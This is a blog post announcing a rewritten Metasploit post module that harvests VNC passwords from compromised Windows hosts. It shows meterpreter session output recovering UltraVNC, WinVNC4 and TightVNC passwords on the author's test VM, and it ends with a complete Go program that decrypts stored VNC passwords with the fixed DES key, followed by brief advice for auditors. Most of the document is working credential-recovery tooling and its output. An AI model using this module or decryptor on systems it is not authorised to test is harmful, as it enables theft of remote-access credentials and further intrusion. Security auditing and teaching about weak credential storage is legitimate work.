Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: 'That's definitely within my coding ability to contribute a patch for.' After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday, it went far beyond just adding a bit of code to support UltraVNC.
Changelog:
- Complete rewrite as a post module instead of a meterpreter script
- Passwords of less than 8 characters are correctly padded (thanks jduck)
- UltraVNC checks added
- TightVNC checks added for both VNC and its control console
- Made it very simple to add new checks in either the registry or in a file
- Output is a bit more verbose (lets you know something is happening)
- Reports authentication credentials found to database
- Identifies the port that VNC is running on as well
It isn't in the Metasploit trunk, so until/if it gets added you can get it here:
If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.
Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways):
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed
msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw
[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter >
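The "hash => password" pairs in the output above are not hashes. vncpasswd cuts the password to 8 bytes, NUL-pads anything shorter (the padding fix from the changelog is about exactly these short values, such as the "111" view-only password), and DES-encrypts that single block with a key hard-coded in every VNC server, so anyone who can read the registry key or ultravnc.ini can recover the password, and characters beyond the eighth add no strength at all ("mypasswo", "adminpas" and "thisismy" are all truncations). The Go program below is an added example written for this page; it is not code from the post module or from Metasploit. It implements both directions of that scheme and is checked against the WinVNC4 and TightVNC values shown above. The key is given in standard-DES bit order (VNC's d3des reads key bits reversed, so its 0x17526b06234e5807 becomes 0xe84ad660c4721ae0 for crypto/des); taking the first 8 bytes of UltraVNC's 9-byte value is an assumption, not something the page states.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// vncFixedKey is the key every vncpasswd implementation hard-codes. VNC's
// d3des reads key bits in reverse order, so for a standard DES library such
// as crypto/des each byte of 0x17526b06234e5807 is bit-reversed, giving this.
var vncFixedKey = []byte{0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0}

// ObfuscateVNCPassword reproduces what vncpasswd stores: the password is cut
// to 8 bytes, NUL-padded up to 8 bytes, and encrypted as one DES-ECB block
// with the fixed key. The result is the hex form seen in the registry.
func ObfuscateVNCPassword(password string) (string, error) {
	block := make([]byte, des.BlockSize)
	copy(block, password) // copy stops at 8 bytes: longer passwords are silently truncated
	c, err := des.NewCipher(vncFixedKey)
	if err != nil {
		return "", err
	}
	out := make([]byte, des.BlockSize)
	c.Encrypt(out, block)
	return hex.EncodeToString(out), nil
}

// RecoverVNCPassword reverses the obfuscation of a stored value (upper- or
// lower-case hex). UltraVNC writes 9 bytes; this function ASSUMES the DES
// block is the first 8 bytes and ignores anything after them.
func RecoverVNCPassword(stored string) (string, error) {
	raw, err := hex.DecodeString(strings.TrimSpace(stored))
	if err != nil {
		return "", fmt.Errorf("stored value is not hex: %w", err)
	}
	if len(raw) < des.BlockSize {
		return "", errors.New("stored value shorter than one DES block")
	}
	c, err := des.NewCipher(vncFixedKey)
	if err != nil {
		return "", err
	}
	out := make([]byte, des.BlockSize)
	c.Decrypt(out, raw[:des.BlockSize])
	// Short passwords were NUL-padded before encryption; strip that padding.
	return strings.TrimRight(string(out), "\x00"), nil
}

func main() {
	// Stored values copied from the module output above (the author's test VM).
	stored := map[string]string{
		"WinVNC4_HKLM":               "c777b2de337a91cf",
		"TightVNC_HKLM":              "7ebf1e76f732459f",
		"TightVNC_HKLM_Control_pass": "f0299fd0e927cf2f",
		"UltraVNC":                   "A85B4C5976979DE93B",
		"UltraVNC (view only)":       "DE2C1BA7393F6708B3",
	}
	for name, v := range stored {
		p, err := RecoverVNCPassword(v)
		if err != nil {
			fmt.Printf("%s: %v\n", name, err)
			continue
		}
		fmt.Printf("%-28s %s => %q\n", name, v, p)
	}
	// Anything beyond 8 characters changes nothing: both settings store the same value.
	a, _ := ObfuscateVNCPassword("mypasswo")
	b, _ := ObfuscateVNCPassword("mypassword-with-more")
	fmt.Println("same stored value for 8- and 20-char password:", a == b)
}
```

The practical consequence for anyone auditing a host is that these registry values and ini files should be handled like cleartext credentials: a VNC password policy cannot enforce more than 8 significant characters, and a server password that also appears elsewhere (domain, local admin) is exposed to anyone with read access to the key.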